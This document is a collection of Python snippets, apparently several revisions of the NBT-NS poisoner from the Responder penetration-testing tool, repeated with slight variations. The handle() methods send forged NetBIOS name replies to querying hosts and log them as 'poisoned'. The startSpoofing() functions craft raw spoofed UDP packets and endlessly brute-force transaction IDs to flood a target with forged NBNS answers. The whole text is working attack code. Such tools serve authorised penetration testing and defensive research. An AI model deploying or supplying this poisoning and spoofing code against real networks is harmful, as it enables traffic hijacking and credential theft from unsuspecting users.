def handle(self): data, socket = self.request Name = Decode_Name(data[13:45]) # Break out if we don't want to respond to this host if RespondToThisHost(self.client_address[0], Name) is not True: return None if data[2:4] == "\x01\x10": Finger = None if settings.Config.Finger_On_Off: Finger = fingerprint.RunSmbFinger((self.client_address[0],445)) if settings.Config.AnalyzeMode: # Analyze Mode LineHeader = "[Analyze mode: NBT-NS]" print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1) else: # Poisoning Mode Buffer = NBT_Ans() Buffer.calculate(data) socket.sendto(str(Buffer), self.client_address) LineHeader = "[*] [NBT-NS]" print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1) if Finger is not None: print text("[FINGER] OS Version : %s" % color(Finger[0], 3)) print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
def handle(self): data, socket = self.request Name = Decode_Name(data[13:45]) # Break out if we don't want to respond to this host if RespondToThisHost(self.client_address[0], Name) is not True: return None if data[2:4] == "\x01\x10": Finger = None if settings.Config.Finger_On_Off: Finger = fingerprint.RunSmbFinger( (self.client_address[0], 445)) if settings.Config.AnalyzeMode: # Analyze Mode LineHeader = "[Analyze mode: NBT-NS]" print color( "%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1) SavePoisonersToDb({ 'Poisoner': 'NBT-NS', 'SentToIp': self.client_address[0], 'ForName': Name, 'AnalyzeMode': '1', }) else: # Poisoning Mode Buffer = NBT_Ans() Buffer.calculate(data) socket.sendto(str(Buffer), self.client_address) LineHeader = "[*] [NBT-NS]" print color( "%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1) SavePoisonersToDb({ 'Poisoner': 'NBT-NS', 'SentToIp': self.client_address[0], 'ForName': Name, 'AnalyzeMode': '0', }) if Finger is not None: print text("[FINGER] OS Version : %s" % color(Finger[0], 3)) print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
def startSpoofing(self): try: targetIp,srcIp,spoofName=settings.Config.spoof.split(":") if targetIp == None or spoofName == None: return except: print "ERROR"+settings.Config.spoof return spoofName = spoofName.upper() encoded_name = ''.join([chr((ord(c)>>4) + ord('A')) + chr((ord(c)&0xF) + ord('A')) for c in spoofName]) padding = "CA"*(15-len(spoofName))+'AA'+'\x00' count = 1000 Buffer = NBT_Ans() Buffer.fields["NbtName"] = '\x20'+encoded_name+padding Buffer.fields["IP"] = socket.inet_aton(settings.Config.Bind_To) Buffer.fields["TTL"] = "\x00\x00\xFF\xFF" Buffer.fields["Tid"] = "\xAA\xAA" outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) packet = IP(src=srcIp,dst=targetIp,)/UDP(sport=137,dport=137) pckt = bytearray(str(packet/Raw(load=str(Buffer)))) #Zero out the UPD checksum pckt[26]='\x00' pckt[27]='\x00' while(True): for i in range(0,255): for j in range(0,255): #Bruteforce the TXID pckt[28]=chr(i) pckt[29]=chr(j) outs.sendto(pckt,(targetIp,137)) count = count+1 if(count>10000): count = 0 LineHeader = "[*] [NBTSpam]" print color (LineHeader,2,1)+" 10000 NBNS replies sent to "+targetIp+" for name "+spoofName
def handle(self): data, socket = self.request Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45])) # Break out if we don't want to respond to this host if RespondToThisHost(self.client_address[0], Name) is not True: return None if data[2:4] == b'\x01\x10': if settings.Config.AnalyzeMode: # Analyze Mode LineHeader = "[Analyze mode: NBT-NS]" print( color( "%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)) SavePoisonersToDb({ 'Poisoner': 'NBT-NS', 'SentToIp': self.client_address[0], 'ForName': Name, 'AnalyzeMode': '1', }) else: # Poisoning Mode Buffer1 = NBT_Ans() Buffer1.calculate(data) socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) LineHeader = "[*] [NBT-NS]" print( color( "%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(NetworkRecvBufferPython2or3( data[43:46]))), 2, 1)) SavePoisonersToDb({ 'Poisoner': 'NBT-NS', 'SentToIp': self.client_address[0], 'ForName': Name, 'AnalyzeMode': '0', })
def startSpoofing(self): try: targetIp, srcIp, spoofName = settings.Config.spoof.split(":") if targetIp == None or spoofName == None: return except: print "ERROR" + settings.Config.spoof return spoofName = spoofName.upper() encoded_name = ''.join([ chr((ord(c) >> 4) + ord('A')) + chr((ord(c) & 0xF) + ord('A')) for c in spoofName ]) padding = "CA" * (15 - len(spoofName)) + 'AA' + '\x00' count = 1000 Buffer = NBT_Ans() Buffer.fields["NbtName"] = '\x20' + encoded_name + padding Buffer.fields["IP"] = socket.inet_aton(settings.Config.Bind_To) Buffer.fields["TTL"] = "\x00\x00\xFF\xFF" Buffer.fields["Tid"] = "\xAA\xAA" outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) packet = IP( src=srcIp, dst=targetIp, ) / UDP(sport=137, dport=137) pckt = bytearray(str(packet / Raw(load=str(Buffer)))) #Zero out the UPD checksum pckt[26] = '\x00' pckt[27] = '\x00' while (True): for i in range(0, 255): for j in range(0, 255): #Bruteforce the TXID pckt[28] = chr(i) pckt[29] = chr(j) outs.sendto(pckt, (targetIp, 137)) count = count + 1 if (count > 10000): count = 0 LineHeader = "[*] [NBTSpam]" print color( LineHeader, 2, 1 ) + " 10000 NBNS replies sent to " + targetIp + " for name " + spoofName